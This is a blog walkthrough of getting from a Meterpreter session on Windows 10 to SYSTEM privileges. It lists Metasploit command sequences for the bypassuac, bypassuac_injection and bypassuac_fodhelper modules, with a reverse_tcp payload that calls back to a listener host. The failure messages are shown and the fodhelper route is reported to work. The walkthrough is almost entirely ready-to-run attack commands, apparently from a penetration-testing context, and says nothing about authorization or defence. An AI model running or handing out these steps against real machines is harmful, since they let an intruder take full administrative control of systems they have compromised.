Utilizing Meterpreter we have started a session with our target machine. The machine is running Windows 10, and we need to gain administrator privileges.
If you try using the usual getsystem command, it fails with an error. Usually you can utilize the bypassuac module, but I have experienced that this also fails with a message that this version of windows 10 is not vulnerable to this attack.
In this blog we will explore the way to solve the problem of the getsystem error and bypassuac failing in windows 10.
I will assume that you have already created your payload, and initiated the reverse_tcp connection wit the target machine. We are now connected and in the Meterpreter terminal.
If we run getuid you can see the username we are logged in with
getsystem attempts to gain us administrator privileges, but fails.
Usually at this point we could switch to using bypassuac to gain administrator privileges.
meterpreter > background
msf6 > set session 1
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit
Above commands will background the open Meterpreter session, load the bypassuac module, set the payload and run the exploit. However on windows 10 it will fail with the message :-
[-] Exploit aborted due to failure: not-vulnerable: Windows 10 (10.0 Build 17763). is not vulnerable.
Another method would be the bypassuac_injection method.
msf6 > use exploit/windows/local/bypassuac_injection
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit
When we run this we get a failure with error message
[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System
If we switch back to our active session with sessions –i 1 and run getsystem again, we still get same failure
So what can we do on windows 10 to get around this problem?
We can use the bypassuac with the addition of fodhelper. Let’s take a look at how this works out
msf6 > use exploit/windows/local/bypassuac_fodhelper
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit
The result of this is that the windows fodhelper.exe is spawned under a new shell that has UAC switched off.
You will now be back inside your session, sysinfo and getuid will both give the same details as before.
Now when you run getsystem I will be succesful
meterpreter > getsystem
meterpreter > getuid
You now have full administrator access to the windows 10 machine. if you execute the shell command, it will give you a command prompt with full administrator privileges.
Buy me a coffee
If you found this article useful and interesting please consider buying me a coffee!
$2.50
penetration test hacker 
One thought on “Bypassing UAC in Windows 10”